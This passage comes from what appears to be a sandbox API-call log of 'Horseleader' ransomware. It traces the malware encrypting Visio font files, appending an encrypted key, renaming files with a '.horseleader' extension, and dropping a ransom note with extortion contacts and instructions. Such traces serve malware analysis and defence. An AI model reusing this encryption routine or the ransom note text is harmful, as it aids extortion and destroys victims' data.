ftCreationTime.dwLowDateTime=0x2b362800, ftCreationTime.dwHighDateTime=0x1c10ce8, ftLastAccessTime.dwLowDateTime=0x8541dd40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x2b362800, ftLastWriteTime.dwHighDateTime=0x1c10ce8, nFileSizeHigh=0x0, nFileSizeLow=0x9e413, dwReserved0=0xb5cdeaf9, dwReserved1=0xa8c03106, cFileName="WHTGTXT.SHX", cAlternateFileName="")) returned 1 [0250.596] lstrcmpiW (lpString1="WHTGTXT.SHX", lpString2="Windows") returned -1 [0250.596] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHTGTXT.SHX") returned 81 [0250.596] StrStrIW (lpFirst="WHTGTXT.SHX", lpSrch=".horseleader") returned 0x0 [0250.596] lstrcmpW (lpString1="WHTGTXT.SHX", lpString2="#Decrypt#.txt") returned 1 [0250.596] lstrcmpW (lpString1="WHTGTXT.SHX", lpString2="_uninstalling_.png") returned 1 [0250.596] lstrlenW (lpString=".testttjffg") returned 11 [0250.596] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHTGTXT.SHX", lpSrch=".testttjffg") returned 0x0 [0250.596] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0250.596] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0250.596] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHTGTXT.SHX" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\whtgtxt.shx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0250.597] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHTGTXT.SHX") returned 81 [0250.597] StrStrW (lpFirst="WHTGTXT.SHX", lpSrch=".txt") returned 0x0 [0250.597] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=648211) returned 1 [0250.597] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.597] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.601] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.601] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.606] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x4ca09, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.606] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.608] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.608] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.609] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x99413, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.609] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.611] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.611] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.611] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.611] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0250.612] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0250.612] CloseHandle (hObject=0x1a4) returned 1 [0250.612] GetProcessHeap () returned 0x780000 [0250.612] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e3120 [0250.612] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHTGTXT.SHX.horseleader") returned 93 [0250.612] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHTGTXT.SHX" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\whtgtxt.shx"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHTGTXT.SHX.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\whtgtxt.shx.horseleader")) returned 1 [0250.613] GetProcessHeap () returned 0x780000 [0250.613] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e3120 | out: hHeap=0x780000) returned 1 [0250.613] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b362800, ftCreationTime.dwHighDateTime=0x1c10ce8, ftLastAccessTime.dwLowDateTime=0x8541dd40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x2b362800, ftLastWriteTime.dwHighDateTime=0x1c10ce8, nFileSizeHigh=0x0, nFileSizeLow=0xdfc98, dwReserved0=0xb5cdeaf9, dwReserved1=0xa8c03106, cFileName="WHTMTXT.SHX", cAlternateFileName="")) returned 1 [0250.613] lstrcmpiW (lpString1="WHTMTXT.SHX", lpString2="Windows") returned -1 [0250.613] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHTMTXT.SHX") returned 81 [0250.613] StrStrIW (lpFirst="WHTMTXT.SHX", lpSrch=".horseleader") returned 0x0 [0250.613] lstrcmpW (lpString1="WHTMTXT.SHX", lpString2="#Decrypt#.txt") returned 1 [0250.613] lstrcmpW (lpString1="WHTMTXT.SHX", lpString2="_uninstalling_.png") returned 1 [0250.613] lstrlenW (lpString=".testttjffg") returned 11 [0250.613] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHTMTXT.SHX", lpSrch=".testttjffg") returned 0x0 [0250.613] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0250.613] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0250.614] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHTMTXT.SHX" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\whtmtxt.shx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0250.614] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHTMTXT.SHX") returned 81 [0250.614] StrStrW (lpFirst="WHTMTXT.SHX", lpSrch=".txt") returned 0x0 [0250.614] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=916632) returned 1 [0250.614] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.615] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.617] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.618] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.619] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x6d64c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.619] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.621] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.621] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.621] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xdac98, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.621] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.624] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.624] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.624] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.624] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0250.624] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0250.624] CloseHandle (hObject=0x1a4) returned 1 [0250.624] GetProcessHeap () returned 0x780000 [0250.624] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e3120 [0250.624] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHTMTXT.SHX.horseleader") returned 93 [0250.624] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHTMTXT.SHX" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\whtmtxt.shx"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHTMTXT.SHX.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\whtmtxt.shx.horseleader")) returned 1 [0250.625] GetProcessHeap () returned 0x780000 [0250.625] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e3120 | out: hHeap=0x780000) returned 1 [0250.625] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b362800, ftCreationTime.dwHighDateTime=0x1c10ce8, ftLastAccessTime.dwLowDateTime=0x8541dd40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x2b362800, ftLastWriteTime.dwHighDateTime=0x1c10ce8, nFileSizeHigh=0x0, nFileSizeLow=0xdfc98, dwReserved0=0xb5cdeaf9, dwReserved1=0xa8c03106, cFileName="WHTMTXT.SHX", cAlternateFileName="")) returned 0 [0250.626] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0250.626] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\#Decrypt#.txt") returned 83 [0250.626] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0250.626] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0250.626] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0250.627] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0250.627] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0250.628] CloseHandle (hObject=0x158) returned 1 [0250.628] GetProcessHeap () returned 0x780000 [0250.628] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0250.628] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81afcd40, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x8541dd40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x8541dd40, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Fonts", cAlternateFileName="")) returned 0 [0250.628] FindClose (in: hFindFile=0x7c6860 | out: hFindFile=0x7c6860) returned 1 [0250.628] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\#Decrypt#.txt") returned 77 [0250.628] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0250.629] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0250.629] WriteFile (in: hFile=0x21c, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aee10*=0x5e4, lpOverlapped=0x0) returned 1 [0250.630] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0250.630] WriteFile (in: hFile=0x21c, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aee10*=0x558, lpOverlapped=0x0) returned 1 [0250.630] CloseHandle (hObject=0x21c) returned 1 [0250.630] GetProcessHeap () returned 0x780000 [0250.630] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dbfd8 | out: hHeap=0x780000) returned 1 [0250.630] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a42070, ftCreationTime.dwHighDateTime=0x1d2dda2, ftLastAccessTime.dwLowDateTime=0xd6cdb800, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd6cdb800, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="VSTO", cAlternateFileName="")) returned 1 [0250.630] lstrcmpiW (lpString1="VSTO", lpString2="Windows") returned -1 [0250.630] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO") returned 55 [0250.630] lstrcmpW (lpString1="VSTO", lpString2=".") returned 1 [0250.630] lstrcmpW (lpString1="VSTO", lpString2="..") returned 1 [0250.630] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0250.630] GetProcessHeap () returned 0x780000 [0250.630] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dbfd8 [0250.630] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\*") returned 57 [0250.630] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\*", lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a42070, ftCreationTime.dwHighDateTime=0x1d2dda2, ftLastAccessTime.dwLowDateTime=0xd6cdb800, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd6cdb800, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName=".", 